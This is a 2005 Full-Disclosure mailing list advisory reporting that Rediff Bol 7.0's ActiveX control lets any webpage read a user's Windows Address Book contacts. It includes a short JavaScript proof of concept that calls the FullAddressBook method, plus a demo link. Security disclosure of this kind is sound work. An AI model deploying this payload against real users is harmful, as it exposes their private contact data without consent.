[Full-disclosure] Rediff Bol 7.0 WAB Contacts
Gregory R. Panakkal
viper31337 at yahoo.co.in
Sun Sep 4 08:57:39 BST 2005
Rediff Bol 7.0 WAB Contacts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Program : Rediff Bol 7.0
It is a popular instant messenger from Rediff.com
Related URL : http://messenger.rediff.com/newbol/
Discovered by : Gregory R. Panakkal
Vulnerability Description :
Rediff Bol's ActiveX control (Fetch.FetchContact.1 /
Fetch.dll) allows a webpage
to read the user's Windows Address Book (WAB)
contacts. The method "FullAddressBook"
returns the WAB contact list in XML format
Proof Of Concept:
[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]
Online Demo:
http://www.infogreg.com/security/im/rediff-bol-7-exposes-wab.html
rgds,
Gregory R. Panakkal
http://www.infogreg.com/
__________________________________________________________
Yahoo! India Matrimony: Find your partner online. Go to http://yahoo.shaadi.com
Full-Disclosure is hosted and sponsored by Secunia.